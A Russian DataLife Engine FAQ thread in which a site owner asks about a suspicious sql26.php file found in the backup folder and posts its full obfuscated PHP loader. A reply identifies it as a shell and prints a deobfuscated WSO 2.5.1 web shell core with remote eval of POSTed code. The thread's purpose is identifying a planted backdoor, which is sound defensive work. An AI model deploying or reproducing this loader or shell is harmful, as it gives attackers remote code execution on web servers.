Задать вопрос
Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Что за файл в backup ?

Что за файл в backup ?

     15.01.2015    Общие вопросы, Общие вопросы по PHP    2476

вопрос
Сейчас при обновлении dle до 10,4 в папке backup нашёл странный файл

Имя файла sql26.php

содержимое 

<?php
$vELN9IS = Array('1'=>'I', '0'=>'N', '3'=>'d', '2'=>'S', '5'=>'X', '4'=>'3', '7'=>'u', '6'=>'t', '9'=>'n', '8'=>'m', 'A'=>'C', 'C'=>'P', 'B'=>'8', 'E'=>'6', 'D'=>'Q', 'G'=>'k', 'F'=>'A', 'I'=>'v', 'H'=>'H', 'K'=>'e', 'J'=>'J', 'M'=>'z', 'L'=>'h', 'O'=>'7', 'N'=>'4', 'Q'=>'O', 'P'=>'0', 'S'=>'c', 'R'=>'2', 'U'=>'s', 'T'=>'g', 'W'=>'B', 'V'=>'K', 'Y'=>'L', 'X'=>'9', 'Z'=>'M', 'a'=>'T', 'c'=>'x', 'b'=>'U', 'e'=>'W', 'd'=>'l', 'g'=>'V', 'f'=>'1', 'i'=>'Z', 'h'=>'p', 'k'=>'q', 'j'=>'j', 'm'=>'a', 'l'=>'b', 'o'=>'R', 'n'=>'r', 'q'=>'o', 'p'=>'G', 's'=>'Y', 'r'=>'y', 'u'=>'F', 't'=>'f', 'w'=>'i', 'v'=>'D', 'y'=>'5', 'x'=>'E', 'z'=>'w');
function vVARD85($vO9FTVV, $vI1S2KH){$vJNUPV9 = ''; for($i=0; $i < strlen($vO9FTVV); $i++){$vJNUPV9 .= isset($vI1S2KH[$vO9FTVV[$i]]) ? $vI1S2KH[$vO9FTVV[$i]] : $vO9FTVV[$i];}
return base64_decode($vJNUPV9);}
$vKL3XLE = 'Jpuf3pLtSpuMSrFX1AJj0pJd0pZ40asRijZPsaid0aT4ZaxrZjbzZ8x4iegdZw1OATqGsRXUl41TC2Fw1Ro80'.
'21OAwoGieiL3ecP5Ruj3pdIlwFX1A3pmecdSPfLlwSOAwoGieiL3ecP54gMigXLm8u'.
'N1vPT3HJfiaUVJpodi8uflHotsRLLS90d3AFX1A35meyGl43MYaxr0ax9QzqVDpd7mgXMi5DqJRgrS8'.
'Xr5RcIirSUadgZaAGOAGWhl8dtSRgPVA3UlR3ti5Jrl4JMJrzzVaUVDpd7m'.
'gXMi5DqJRfLKuXdKpgj35ohlRyt3pd6i2SUZAGOAGWMi5ot3pd6igXUmefh3ATzVaUVD'.
'H0d3uX6se3hsfXc3eXPi50tS9g73pd6i2TzVaUVDpodi8d7i2T9gf0C5fiubd0JaPN9YAF9ZwNfYjx9VaUVA8d8V'.
'p3d3uX6se3hsfXc3eXPi50ti4WjVAGh1HUV1AFT1pifl80PmeX71u3aa4'.
'0PS8dzSRcLSRLdSrTGs5Jrs5Gh1HUV1AFT1AFT1AWri5ofS8NTm50ts5Jrs5GqJpurS8uyV2F/1purS8uy5RfLSA'.
'T9gf0CS4orm5WMlpuMmpgMJrzTJpurS8uyV2FE1H0PS8dzSRcLSRLdSrTG'.
's5Jrs5GhQzqT1AFTtDqT1AFTJuXDaf0b1vPTgf0CS4orm5WMlp'.
'uMmpgMVAotbxXagAGOAwFT1AFG5P0CaP6Jo2FX1u3aa40PS8dzSRcLSRLdSrTG5P0CaP6Jo2GOA9PVA8i'.
'fl80PmeX71H3MlPcIiRd7VAGTKzqT1AFTmpgLipgrVA31guoDYMx7ZAFPZvDTa8XP1xiI'.
'3eyGJrGOAwFT1AWGmebq1jDz0A1hQzhXATh83eyj3pdIlwW5bPXMi'.
'5ojlRXnmebqJpUU1AoRV2WOAwFT1AFG5P0CaP6JogUGmfPTC2FG3jUV1AFT1H0d3p0IlR6hi2TGmrzTJHshQzhXAThhiwTL'.
'iefz3HGqJpuf3pLtSpuMSrGh1HUV1AFT1pd8VpdMSRgPVAotbxXaguU9SpuMSr33V2F8'.
'JwFqleDfVAotbxXaguU9SpuMSr33V2FXC2FGs5gPmuXzs50MV2GV1AFT1AFT1AW5'.
'bPXMi5ojlRXnmebqleDfVAotbPg2gGg2er31guoD5PLCbfD952GU1AoL35oq54WLS4ZhQzqV1AFT1pd81ATLm50Mi5DqJuXva'.
'PXY2bglleDfVAotbPg2gGg2er31guoD5PLCbfD952d3V2WBtAFqJ'.
'uXvaPXY2bglleDfVAotbPg2gGg2er31guoD5PLCbfD952d31AxX1AoL35oq54WLS4ZhVDqT'.
'1AFT1AFT1H3MlPcIiRd7VAGOA9PVA8ifl80PmeX71puj3pdIldJvVAGTKzqT1AFT'.
'mesq1bFG5fWCbfolJ4FcJfPh1HUV1AFT1AFT1AFGs2FX1purS8uyVFqT1AFT1AFT1AFT1AFw3eyLlebw1vP+1HWqSuXfl8u6'.
'i2ThYFqT1AFT1AFT1AFT1AFwSpLz54idS90hlRNw1vP+1HWqSHidS90hlRNqV2zV1AFT1AFT1AFT1AFT193MlfXRi5JMmeX71w'.
'FXCwW5bPXtgGg2bPdCawzV1AFT1AFT1AFT1AFT190Li8g6lRod1wFXCwWFm'.
'eyh5R3d3AT9SRu8igX6lRodJrGV1AFT1AFT1AFhQzqT1AFT1AFT1pgjmpBTSR'.
'grmeuUm5hdVAoLVaUV1AFT1HPTiecMi2WOAwFT1AFT1AFTi5iLlATG5fWCbfolJ4FcJfPhQzqT1AFTtDhXA8d8VAWdl5WPK2TG5f'.
'WCbfolJRx952GTVDqT1AFTmesqm50Mi5DqJpodi8uflHotse0PmeX7V2F8JwW83eyj3pdIldXdKpdM3HZqJRuj3pdIlwSTYwFGi'.
'pg8s5gU3uXLs4ohlRNhVDqT1AFT1AFT1AotbxXaguU9s2331vPTJpodi8uflHotse0Pm'.
'eX7QzqT1AFTiecMiDqT1AFT1AFT1AotbxXaguU9s2331vPTJf0dsPd'.
'7i8B9QzhhiwTT1eg6SHoyVAotbxXaguU9s233V2F8JwW83eyj3pdIldXdKpdM3HZqJRuj3pdIlwSTYwFG5fWCbfolJR'.
'x952GTVDqT1AFTsRuUluXfSRgr5Rifl8ZqJRuj3pdIlwSTYwFG5fWCbfolJ'.
'Rx952GOA8gNm5DO';
eval(vVARD85($vKL3XLE, $vELN9IS));?>


Что это за файл и что он делает?? я так понять и не смог у него права от веб сервера

Ответил: Attyla

eval($_POST['p1']);
- явно что-то нехорошее.

Update:
Это Shell

2 комментария

Attyla
Юзер

Attyla - 15 января 2015 22:52 -

У меня после пары манипуляций, получилось вот это:


<?php
$auth_pass        = "c4be4c7566f34a6e5871122502a7eee2";
$color            = "#df5";
$default_action   = 'FilesMan';
$default_use_ajax = true;
$default_charset  = 'Windows-1251';
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');
if (get_magic_quotes_gpc()) {
    function WSOstripslashes($array)
    {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST   = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin()
{
    header('HTTP/1.0 404 Not Found');
    die("404");
}
function WSOsetcookie($k, $v)
{
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
if (!empty($auth_pass)) {
    if (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
        wsoLogin();
}
function actionRC()
{
    if (!@$_POST['p1']) {
        $a = array(
            "uname" => php_uname(),
            "php_version" => phpversion(),
            "wso_version" => WSO_VERSION,
            "safemode" => @ini_get('safe_mode')
        );
        echo serialize($a);
    } else {
        eval($_POST['p1']);
    }
}
if (empty($_POST['a']))
    if (isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else
        $_POST['a'] = 'SecInfo';
if (!empty($_POST['a']) && function_exists('action' . $_POST['a']))
    call_user_func('action' . $_POST['a']);
exit;
?>
Attyla
Юзер

Attyla - 15 января 2015 22:58 -

***Комментарий удален***
Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

 18.11.2011 Delbigor  Общие вопросы
 23.07.2012 SimPS  Общие вопросы
 18.10.2012 Webster  Общие вопросы
 17.12.2012 Гость  Все вопросы, Общие вопросы
 23.12.2012 lumb  Общие вопросы
 16.10.2013 Arsen  Общие вопросы
 21.11.2013 doktorpull  Общие вопросы, Ламерские вопросы
 06.12.2013 golden_eagle_god  Общие вопросы, Общие вопросы по PHP
 12.04.2014 pavel31  Общие вопросы, Общие вопросы по PHP
 31.07.2014 inzer  Общие вопросы, MySQL
  • TeraMoune | Сделать модуль опросы 3
    Фото TeraMoune
    TeraMoune
    Сделать модуль опросы
    Вчера, 13:32
    Конечно. Пишите в телеграм.
  • Nimax | Сделать модуль опросы 3
    Фото Nimax
    Nimax
    Сделать модуль опросы
    Вчера, 13:17
    Да в том и дело =) так и думал можете сделать? сколько будет по стоимости?
  • TeraMoune | Сделать модуль опросы 3
    Фото TeraMoune
    TeraMoune
    Сделать модуль опросы
    Вчера, 12:56
    Зачем же для этого модуль ? Есть стандартные опросы, достаточно добавить одну правку на обработку тега в описании новости от стандартного тега poll.
  • Nimax | Создание простого сайта отзывов (рейтинг ... 3
    Фото Nimax
    Nimax
    Создание простого сайта отзывов (рейтинг и сортировка) - модуль PostReviews
    Вчера, 12:14
    А есть скрины или демо как это на фронте выглядит?
  • New-dev.ru | Создание простого сайта отзывов (рейтинг ... 3
    Фото New-dev.ru
    New-dev.ru
    Создание простого сайта отзывов (рейтинг и сортировка) - модуль PostReviews
    21-04-2024, 18:25
    Эта старая публикация, за несколько месяцев цена выросла, а тут забыл исправить цену, сожалею. Сейчас поставил актуальную цену.
  • Nimax | Создание простого сайта отзывов (рейтинг ... 3
    Фото Nimax
    Nimax
    Создание простого сайта отзывов (рейтинг и сортировка) - модуль PostReviews
    21-04-2024, 13:18
    Как преобрести за 9$? на сайте цена другая
  • Jigurda | Как в description вставить значение доп. ... 2
    Фото Jigurda
    Jigurda
    Как в description вставить значение доп.поля?
    19-04-2024, 10:54
    Немного не то. Нужно не заменить, а добавить к уже имеющемуся description свой текст с доп.полями
  • lutskboy | Как в description вставить значение доп. ... 2
    Фото lutskboy
    lutskboy
    Как в description вставить значение доп.поля?
    18-04-2024, 21:51
    https://sandev.pro/web/159-fullstory-metatags-by-sander.html
  • derebas | Как реализовать кнопку "Поделиться" как ... 1
    Фото derebas
    derebas
    Как реализовать кнопку "Поделиться" как на Плей Маркете?
    18-04-2024, 09:39
    Ну если на скорую руку то примерно так
    <style>
.sociallinks {
    display: none;
    position: fixed;
    z-index: 999;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0,0,0,0.4);
}

.sociallinks-content {
    background-color: #fefefe;
    margin: auto;
    padding: 20px;
    border: 1px solid #888;
    width: 80%;
    max-width: 500px;
    border-radius: 10px;
    position: absolute;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
}

.close {
    color: #aaa;
    position: absolute;
    top: 10px;
    right: 10px;
    font-size: 28px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: black;
    text-decoration: none;
    cursor: pointer;
}

.social-container {
    display: flex;
    align-items: center;
}
.social-container > div {
    margin-left: 10px;
}

h2, p {
    margin: 5px 0;
}
.social {
  padding-top: 20px;
}
.social img {
  margin: 10px;
}
.sharebtn {
  padding-top: 20px;
  width: 100%;
}
.sharebtn_area {
  border: 1px solid black;
  height: 40px;
}
.sharebtn input[type="text"] {
  width: 70%;
  border: none;
  height: 95%;
}
.sharebtn button {
  width: 25%;
  height: 95%;
  border: none;
  background-color: #fff;
}
</style>
<button id="opensociallinksBtn">Поделиться</button>

<div id="mysociallinks" class="sociallinks">
  <div class="sociallinks-content">
    <span class="close">×</span>
    <div class="social-container">
        <img src="{image-1}" alt="Icon" width="30" height="30">
        <div>
            <h2>{title}</h2> 
            <p>Поделиться</p> 
        </div>
    </div>
    <div class="social">
        <a href="https://api.whatsapp.com/send/?text={full-link}"><img src="whatsapp.png" alt="WhatsApp" width="30" height="30"></a>
        <a href="https://www.facebook.com/sharer/sharer.php?u={full-link}"><img src="facebook.png" alt="Facebook" width="30" height="30"></a>
        <a href="https://twitter.com/intent/post?url={full-link}"><img src="twitter.png" alt="Twitter" width="30" height="30"></a>
        <a href="https://www.instagram.com/share?url={full-link}"><img src="instagram.png" alt="Instagram" width="30" height="30"></a>
    </div>
    <div class="sharebtn">
      <div class="sharebtn_area">
        <input type="text" id="inputText" value="{full-link}" readonly="true">
        <button id="copyBtn">Поделиться <img src="share.png" width="10px" alt="Share Icon"></button>
      </div>
    </div>
  </div>
</div>

<script>
var sociallinks = document.getElementById("mysociallinks");
var opensociallinksBtn = document.getElementById("opensociallinksBtn");
var closeBtn = document.getElementsByClassName("close")[0];
var copyBtn = document.getElementById("copyBtn");
var inputText = document.getElementById("inputText");

opensociallinksBtn.onclick = function() {
  sociallinks.style.display = "block";
}

closeBtn.onclick = function() {
  sociallinks.style.display = "none";
}

window.onclick = function(event) {
  if (event.target == sociallinks) {
    sociallinks.style.display = "none";
  }
}

copyBtn.onclick = function() {
  inputText.select();
  document.execCommand("copy");
}
</script>
  • doktorpull | GeoIP - показ информации в зависимости о ... 1
    Фото doktorpull
    doktorpull
    GeoIP - показ информации в зависимости от страны посетителя сайта
    17-04-2024, 21:53
    Отличный модуль, хорошо работает. Рекомендую этого автора, так как заказывал у него несколько собственных разработок. Человек знает свое дело.
наверх